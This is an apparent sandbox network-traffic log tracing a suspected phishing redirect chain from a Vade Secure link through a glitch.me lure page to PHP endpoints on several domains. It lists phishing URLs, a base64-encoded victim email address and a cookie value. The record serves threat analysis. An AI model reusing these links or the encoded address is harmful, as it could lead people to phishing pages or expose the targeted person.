            Source: global trafficHTTP traffic detected: GET /app/config/config.json HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-type: */*sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /4.efcb4f36899adf4857d1.js HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /app/config/config.json HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /translations/en.json HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-type: */*sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https:%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/load.svg HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https:%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/logo-cloud.png HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https:%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/load.svg HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /translations/en.json HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/logo-cloud.png HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https:%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /analyse HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /_a.html?send_id=eh&tvi2_RxT=www.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH&e=ZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZy HTTP/1.1Host: jbse.belgrin.com.auConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://antiphishing.vadesecure.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jbse.belgrin.com.au/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: jbse.belgrin.com.auConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jbse.belgrin.com.au/_a.html?send_id=eh&tvi2_RxT=www.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH&e=ZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=_Are2.0ZaQZ.X3J62xnzu7M7cHMmBuPMibOUol.lQxg-1744722270-1.0.1.1-H9ffWtAH_RvtvD4HG__JlAeMhA1eGaoPAFu_4hsnu4o1aaJU9JxveAMO8yS93nueT5nv1L3hd.QMuLVGm5.3GbkpKuTK.6j33ikOsIlWYxyja6a9Hm7TlrI_e0UD3z9M
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: jbse.belgrin.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: dour-automatic-transport.glitch.meConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://jbse.belgrin.com.au/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /f6136e9b49.js HTTP/1.1Host: kit.fontawesome.comConnection: keep-aliveOrigin: https://dour-automatic-transport.glitch.mesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dour-automatic-transport.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /inbox.com HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dour-automatic-transport.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dailycer.fr HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dour-automatic-transport.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/images/Docubg.jpg HTTP/1.1Host: reformassegura.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dour-automatic-transport.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/images/banner.jpg HTTP/1.1Host: reformassegura.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dour-automatic-transport.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dailycer.fr HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/images/banner.jpg HTTP/1.1Host: reformassegura.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/images/Docubg.jpg HTTP/1.1Host: reformassegura.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /docu/me.php HTTP/1.1Host: xsapz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /em/e.php HTTP/1.1Host: aicreative.beConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://dour-automatic-transport.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficDNS traffic detected: DNS query: antiphishing.vadesecure.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: jbse.belgrin.com.au
            Source: global trafficDNS traffic detected: DNS query: www.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: dour-automatic-transport.glitch.me
            Source: global trafficDNS traffic detected: DNS query: kit.fontawesome.com
            Source: global trafficDNS traffic detected: DNS query: reformassegura.com
            Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
            Source: global trafficDNS traffic detected: DNS query: xsapz.com
            Source: global trafficDNS traffic detected: DNS query: aicreative.be
            Source: unknownHTTP traffic detected: POST /analyse HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-aliveContent-Length: 381sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-type: */*sec-ch-ua-mobile: ?0Origin: https://antiphishing.vadesecure.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https:%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/plain; charset=utf-8vary: Originx-content-type-options: nosniffdate: Tue, 15 Apr 2025 13:04:27 GMTcontent-length: 19connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Apr 2025 13:05:09 GMTContent-Length: 9Connection: closeaccess-control-allow-headers: accept, accept-langauge, content-language, content-type, fa-kit-tokenaccess-control-allow-methods: GET, OPTIONSaccess-control-allow-origin: *access-control-max-age: 3000Cache-Control: max-age=0, private, must-revalidatex-request-id: GDZ_smdgz4b6WCUWA72CCF-Cache-Status: MISSServer: cloudflareCF-RAY: 930ba7246db17be1-ATL
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
